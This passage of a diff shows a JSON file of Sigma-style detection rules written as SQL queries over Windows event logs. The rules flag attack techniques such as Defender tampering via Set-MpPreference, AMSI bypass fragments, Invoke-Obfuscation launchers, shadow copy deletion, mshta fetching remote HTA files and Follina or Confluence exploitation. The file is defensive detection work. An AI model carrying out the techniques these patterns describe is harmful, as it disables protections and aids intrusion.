'%TOKEN\\_IMPERSONATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_INFORMATION\\_CLASS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_QUERY%' ESCAPE '\\' OR ScriptBlockText LIKE '%Metasploit%' ESCAPE '\\' OR ScriptBlockText LIKE '%Mimikatz%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%gwmi%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CimInstance%' ESCAPE '\\' OR ScriptBlockText LIKE '%gcim%' ESCAPE '\\') AND 
ScriptBlockText LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.Delete()%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%rwmi%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-CimInstance%' ESCAPE '\\' OR ScriptBlockText LIKE '%rcim%' ESCAPE '\\'))" ], - "filename": "posh_ps_malicious_keywords.yml" + "filename": "posh_ps_susp_win32_shadowcopy_deletion.yml" }, { - "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet - PS", - "id": "22d80745-6f2c-46da-826b-77adaededd74", + "title": "Tamper Windows Defender - PSClassic", + "id": "ec19ebab-72dc-40e1-9728-4c0b805d722c", "status": "experimental", - "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Attempting to disable scheduled scanning and other parts of windows defender atp. 
Or set default actions to allow.", + "author": "frack113", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.t1562.001" ], "falsepositives": [ - "Rare intended use of hidden services", - "Rare FP could occur due to the non linearity of the ScriptBlockText log" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' ESCAPE '\\') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%D;;%' ESCAPE '\\' AND (ScriptBlockText LIKE '%;;;IU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;BA%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SY%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;WD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '600' AND Channel = 'Windows PowerShell') AND ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND (HostApplication LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning 
$true%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND HostApplication LIKE '%Allow%' ESCAPE '\\' AND (HostApplication LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (HostApplication LIKE '%ltdefac %' ESCAPE '\\' OR HostApplication LIKE '%mtdefac %' ESCAPE '\\' OR HostApplication LIKE '%htdefac %' ESCAPE '\\' OR HostApplication LIKE '%stdefac %' ESCAPE '\\'))))" ], - "filename": "posh_ps_susp_service_dacl_modification_set_service.yml" + "filename": "posh_pc_tamper_with_windows_defender.yml" }, { - "title": "Abuse of Service Permissions to Hide Services Via Set-Service - PS", - "id": "953945c5-22fe-4a92-9f8a-a9edc1e522da", - "status": "experimental", - "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. 
(Works only in powershell 7)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Remote PowerShell Session (PS Classic)", + "id": "60167e5c-84b2-4c95-a7ac-86281f27c445", + "status": "test", + "description": "Detects remote PowerShell sessions", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ - "Rare intended use of hidden services", - "Rare FP could occur due to the non linearity of the ScriptBlockText log" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%DCLCWPDTSD%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' ESCAPE '\\'))" - ], - "filename": "posh_ps_using_set_service_to_hide_services.yml" - }, - { - "title": "Powershell Install a DLL in System Directory", - "id": "63bf8794-9917-45bc-88dd-e1b5abc0ecfd", - "status": "experimental", - "description": "Uses PowerShell to install/copy a a file into a system directory such as \"System32\" or \"SysWOW64\"", - "author": "frack113, Nasreddine Bencherchali", - "tags": [ - "attack.credential_access", - "attack.t1556.002" - ], - "falsepositives": [ - "Unknown" + "Legitimate use remote PowerShell sessions" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Copy-Item %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Destination %' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Windows\\\\System32%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Windows\\\\SysWOW64%' ESCAPE '\\'))" + 
"SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostName = 'ServerRemoteHost' AND HostApplication LIKE '%wsmprovhost.exe%' ESCAPE '\\')" ], - "filename": "posh_ps_copy_item_system_directory.yml" + "filename": "posh_pc_remote_powershell_session.yml" }, { - "title": "AMSI Bypass Pattern Assembly GetType", - "id": "e0d6c087-2d1c-47fd-8799-3904103c5a98", - "status": "experimental", - "description": "Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts", - "author": "Florian Roth (Nextron Systems)", + "title": "PowerShell Called from an Executable Version Mismatch", + "id": "c70e019b-1479-4b65-b0cc-cd0c6093a599", + "status": "test", + "description": "Detects PowerShell called from an executable by the version mismatch method", + "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001", - "attack.execution" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND ScriptBlockText LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND ScriptBlockText LIKE '%NonPublic,Static%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND (EngineVersion LIKE '2.%' ESCAPE '\\' OR EngineVersion LIKE '4.%' ESCAPE '\\' OR EngineVersion LIKE '5.%' ESCAPE '\\') AND HostVersion LIKE '3.%' ESCAPE '\\')" ], - "filename": "posh_ps_amsi_bypass_pattern_nov22.yml" + "filename": "posh_pc_exe_calling_ps.yml" }, { - "title": "Suspicious PowerShell Mailbox Export to Share - PS", - "id": "4a241dea-235b-4a7e-8d76-50d817b146c4", - "status": "experimental", - "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as 
used in ProxyShell exploitations", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Delete Volume Shadow Copies Via WMI With PowerShell", + "id": "87df9ee1-5416-453a-8a08-e8d4a51e9ce1", + "status": "stable", + "description": "Shadow Copies deletion using operating systems utilities via PowerShell", + "author": "frack113", "tags": [ - "attack.exfiltration" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Mailbox %' ESCAPE '\\' AND ScriptBlockText LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%Get-WmiObject%' ESCAPE '\\' AND HostApplication LIKE '% Win32\\_Shadowcopy%' ESCAPE '\\' AND (HostApplication LIKE '%Delete()%' ESCAPE '\\' OR HostApplication LIKE '%Remove-WmiObject%' ESCAPE '\\'))" ], - "filename": "posh_ps_mailboxexport_share.yml" + "filename": "posh_pc_delete_volume_shadow_copies.yml" }, { - "title": "Execution via CL_Invocation.ps1 - Powershell", - "id": "4cd29327-685a-460e-9dac-c3ab96e549dc", - "status": "experimental", - "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", - "author": "oscd.community, Natalia Shornikova", + "title": "Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt", + "id": "245f92e3-c4da-45f1-9070-bc552e06db11", + "status": "test", + "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - 
"attack.t1216" + "attack.initial_access", + "attack.execution", + "attack.t1190", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%SyncInvoke%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\Atlassian\\\\Confluence\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%curl%' ESCAPE '\\' OR CommandLine LIKE '%ipconfig%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\'))" ], - "filename": "posh_ps_cl_invocation_lolscript.yml" + "filename": "proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell", - "id": "e55a5195-4724-480e-a77e-3ebe64bd3759", + "title": "Remotely Hosted HTA File Executed Via Mshta.EXE", + "id": "b98d0db6-511d-45de-ad02-e82a98729620", "status": "experimental", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects execution of the \"mshta\" utility with an argument containing the \"http\" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1218.005" ], 
"falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%set%' ESCAPE '\\' AND ScriptBlockText LIKE '%&&%' ESCAPE '\\' AND ScriptBlockText LIKE '%mshta%' ESCAPE '\\' AND ScriptBlockText LIKE '%vbscript:createobject%' ESCAPE '\\' AND ScriptBlockText LIKE '%.run%' ESCAPE '\\' AND ScriptBlockText LIKE '%(window.close)%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_obfuscation_via_use_mhsta.yml" + "filename": "proc_creation_win_mshta_http.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell", - "id": "0adfbc14-0ed1-11eb-adc1-0242ac120002", + "title": "Suspicious MSDT Parent Process", + "id": "7a74da6b-ea76-47db-92cc-874ad90df734", "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation", + "author": "Nextron Systems", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1036", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE 
'%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe'))" ], - "filename": "posh_ps_invoke_obfuscation_var.yml" + "filename": "proc_creation_win_msdt_susp_parent.yml" }, { - "title": "Tamper Windows Defender - ScriptBlockLogging", - "id": "14c71865-6cd3-44ae-adaa-1db923fae5f2", - "status": "experimental", - "description": "Detects powershell scripts attempting to disable scheduled scanning and other parts of windows defender atp or set default actions to allow.", - "author": "frack113, elhoim, Tim Shelton (fps, alias support)", + "title": "Renamed MegaSync Execution", + "id": "643bdcac-8b82-49f4-9fd9-25a90b929f3b", + "status": "test", + "description": "Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.", + "author": "Sittikorn S", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Software that illegally integrates MegaSync in a renamed form", + "Administrators that have renamed MegaSync" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR 
ScriptBlockText LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND ScriptBlockText LIKE '%Allow%' ESCAPE '\\' AND (ScriptBlockText LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (ScriptBlockText LIKE '%ltdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%mtdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%htdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%stdefac %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'megasync.exe' AND NOT 
(NewProcessName LIKE '%\\\\megasync.exe' ESCAPE '\\'))" ], - "filename": "posh_ps_tamper_defender.yml" + "filename": "proc_creation_win_renamed_megasync.yml" }, { - "title": "Suspicious PowerShell Invocations - Generic", - "id": "ed965133-513f-41d9-a441-e38076a0798f", + "title": "Regedit as Trusted Installer", + "id": "883835a7-df45-43e4-bf1d-4268768afda4", "status": "test", - "description": "Detects suspicious PowerShell invocation command parameters", + "description": "Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ - "Very special / sneaky PowerShell scripts" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '% -enc %' ESCAPE '\\' OR ScriptBlockText LIKE '% -EncodedCommand %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ec %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -w hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -window hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -w 1 %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -noni %' ESCAPE '\\' OR ScriptBlockText LIKE '% -noninteractive %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\TrustedInstaller.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_invocation_generic.yml" + "filename": "proc_creation_win_regedit_trustedinstaller.yml" }, { - "title": "Silence.EDA Detection", - "id": "3ceb2083-a27f-449a-be33-14ec1b7cc973", - "status": "test", - "description": "Detects Silence EmpireDNSAgent as described in the 
Group-IP report", - "author": "Alina Stepchenkova, Group-IB, oscd.community", - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.command_and_control", - "attack.t1071.004", - "attack.t1572", - "attack.impact", - "attack.t1529", - "attack.g0091", - "attack.s0363" - ], + "title": "HackTool - PCHunter Execution", + "id": "fca949cc-79ca-446e-8064-01aa7e52ece5", + "status": "experimental", + "description": "Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.Diagnostics.Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%Stop-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Restart-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Exception in execution%' ESCAPE '\\' AND ScriptBlockText LIKE '%$cmdargs%' ESCAPE '\\' AND ScriptBlockText LIKE '%Close-Dnscat2Tunnel%' ESCAPE '\\' AND ScriptBlockText LIKE '%set type=$LookupType`nserver%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Command | nslookup 2>&1 | Out-String%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-RandomDNSField%' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::ToString($SYNOptions, 16)%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session.Dead = $True%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session[\"Driver\"] -eq%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\PCHunter64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PCHunter32.exe' ESCAPE '\\') OR OriginalFileName = 'PCHunter.exe' OR Description = 'Epoolsoft Windows Information View Tools' OR (Hashes LIKE '%SHA1=5F1CBC3D99558307BC1250D084FA968521482025%' ESCAPE '\\' OR Hashes 
LIKE '%MD5=987B65CD9B9F4E9A1AFD8F8B48CF64A7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2B214BDDAAB130C274DE6204AF6DBA5AEEC7433DA99AA950022FA306421A6D32%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=444D210CEA1FF8112F256A4997EED7FF%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3FB89787CB97D902780DA080545584D97FB1C2EB%' ESCAPE '\\' OR Hashes LIKE '%MD5=228DD0C2E6287547E26FFBD973A40F14%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55F041BF4E78E9BFA6D4EE68BE40E496CE3A1353E1CA4306598589E19802522C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0479F44DF47CFA2EF1CCC4416A538663%' ESCAPE '\\') OR md5 IN ('228dd0c2e6287547e26ffbd973a40f14', '987b65cd9b9f4e9a1afd8f8b48cf64a7') OR sha1 IN ('5f1cbc3d99558307bc1250d084fa968521482025', '3fb89787cb97d902780da080545584d97fb1c2eb') OR sha256 IN ('2b214bddaab130c274de6204af6dba5aeec7433da99aa950022fa306421a6d32', '55f041bf4e78e9bfa6d4ee68be40e496ce3a1353e1ca4306598589e19802522c') OR Imphash IN ('444d210cea1ff8112f256a4997eed7ff', '0479f44df47cfa2ef1ccc4416a538663')))" ], - "filename": "posh_ps_apt_silence_eda.yml" + "filename": "proc_creation_win_hktl_pchunter.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell", - "id": "a5a30a6e-75ca-4233-8b8c-42e0f2037d3b", + "title": "HackTool - LocalPotato Execution", + "id": "6bd75993-9888-4f91-9404-e1e4e4e34b77", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "cve.2023.21746" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND 
ScriptBlockText LIKE '%&&%' ESCAPE '\\' AND ScriptBlockText LIKE '%rundll32%' ESCAPE '\\' AND ScriptBlockText LIKE '%shell32.dll%' ESCAPE '\\' AND ScriptBlockText LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ScriptBlockText LIKE '%value%' ESCAPE '\\' OR ScriptBlockText LIKE '%invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%comspec%' ESCAPE '\\' OR ScriptBlockText LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\LocalPotato.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe -i C:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%-o Windows\\\\%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=E1742EE971D6549E8D4D81115F88F1FC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DD82066EFBA94D7556EF582F247C8BB5%' ESCAPE '\\') OR Imphash IN ('E1742EE971D6549E8D4D81115F88F1FC', 'DD82066EFBA94D7556EF582F247C8BB5')))" ], - "filename": "posh_ps_invoke_obfuscation_via_use_rundll32.yml" + "filename": "proc_creation_win_hktl_localpotato.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell", - "id": "e54f5149-6ba3-49cf-b153-070d24679126", - "status": "experimental", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "title": "Suspicious Call by Ordinal", + "id": "e79a9e79-eb72-4e78-a628-0e7e8f59e89c", + "status": "stable", + "description": "Detects suspicious calls of DLLs in rundll32.dll exports by ordinal", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1218.011" ], "falsepositives": [ - "Unknown" + "False positives depend on scripts and administrative tools used in the monitored environment", + "Windows control panel elements have been identified as source (mmc)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND 
